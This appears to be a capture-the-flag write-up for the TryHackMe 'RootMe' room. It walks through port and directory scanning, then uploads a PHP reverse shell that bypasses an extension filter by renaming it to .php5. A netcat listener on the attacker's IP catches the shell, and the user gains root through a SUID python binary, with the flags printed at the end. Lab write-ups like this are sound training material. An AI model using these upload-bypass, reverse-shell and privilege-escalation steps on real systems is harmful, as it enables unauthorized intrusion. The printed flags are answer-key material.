RootMe
Task 1: Deploy the machine
Deploy the machine
No answer needed
Task 2: Reconnaissance
Scan the machine, how many ports are open?
Let's run a
nmapscan to see which ports are open.
$ nmap -sC -sV 10.10.216.90
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-12 19:05 IST
Nmap scan report for 10.10.216.90
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.85 secondsThere are two open ports:
22
ssh
80
http
Answer
2What version of Apache is running?
Answer
2.4.29What service is running on port 22?
Answer
SSHFind directories on the web server using the GoBuster tool.
We can find directories with the following command:
$ gobuster dir -u http://10.10.216.90 -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.216.90
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 310] [--> http://10.10.216.90/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.216.90/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.216.90/panel/]
/uploads (Status: 301) [Size: 314] [--> http://10.10.216.90/uploads/]
Progress: 959 / 960 (99.90%)
===============================================================
Finished
===============================================================No answer needed
What is the hidden directory?
Answer
/panel/Task 3: Getting a shell
user.txt
In order to get a reverse shell, we have to first go to the
/paneldirectory.
There are multiple ways of obtaining a reverse shell. We will be using a
phpreverse shell.We will be using the
/usr/share/webshells/php/php-reverse-shell.phpscript after making some modifications.
We have to replace the IP address with our own IP address which we can find using the
ipcommand. We can also change the port to any particular port we want like9999.
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:9f:ce:18 brd ff:ff:ff:ff:ff:ff
inet 10.0.4.6/24 brd 10.0.4.255 scope global dynamic noprefixroute eth0
valid_lft 332sec preferred_lft 332sec
inet6 fe80::a00:27ff:fe9f:ce18/64 scope link noprefixroute
valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.17.48.138/17 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::691d:5bb7:720:68ac/64 scope link stable-privacy
valid_lft forever preferred_lft foreverOnce we have replaced the IP address we are ready to upload our
php-reverse-shell.phpfile.
Let's click on the
Uploadbutton next.
Looks like
phpis not allowed.There is a workaround for this, we can try to change the file extension to
php5to see if that is allowed.
Let's hit
Upload.
Our file upload has been successful.
We can now use
netcatto listen for requests.
$ nc -nlvp 9999Next, let's go to the
/uploadsfolder.
On clicking on the
php-reverse-shell.php5link, a request will be sent to our IP address on the9999port which will be caught by ournetcatlistener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.216.90] 44132
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:26:08 up 54 min, 0 users, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ We have our reverse shell.
Let's find the
user.txtfile using thefindcommand.
$ find / -name user.txt 2>/dev/null
/var/www/user.txtNow we simply have to
catthe file.
$ cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}Answer
THM{y0u_g0t_a_sh3ll}Task 4: Privilege escalation
Search for files with SUID permission, which file is weird?
Again, we can use the
findcommand to find the relevant file.
$ find / -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umountOut of all the binaries with the SUID bit set, the
/usr/bin/pythonbinary is the most unusual.
Answer
/usr/bin/pythonFind a form to escalate your privileges.
We will be using the
pythonutility to escalate our privilege since it already has the SUID bit set.But before we do that, we need to check out GTFObins for a shell script.
We have to use the selected script with the
/usr/bin/pythoninterpreter.
$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
rootWe have successfully escalated our privilege to
root.
No answer needed
root.txt
Let's find the
root.txtfile.
find / -name root.txt 2>/dev/null
/root/root.txtAll we have to do now is
catthe file.
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}Answer
THM{pr1v1l3g3_3sc4l4t10n}Last updated
Was this helpful?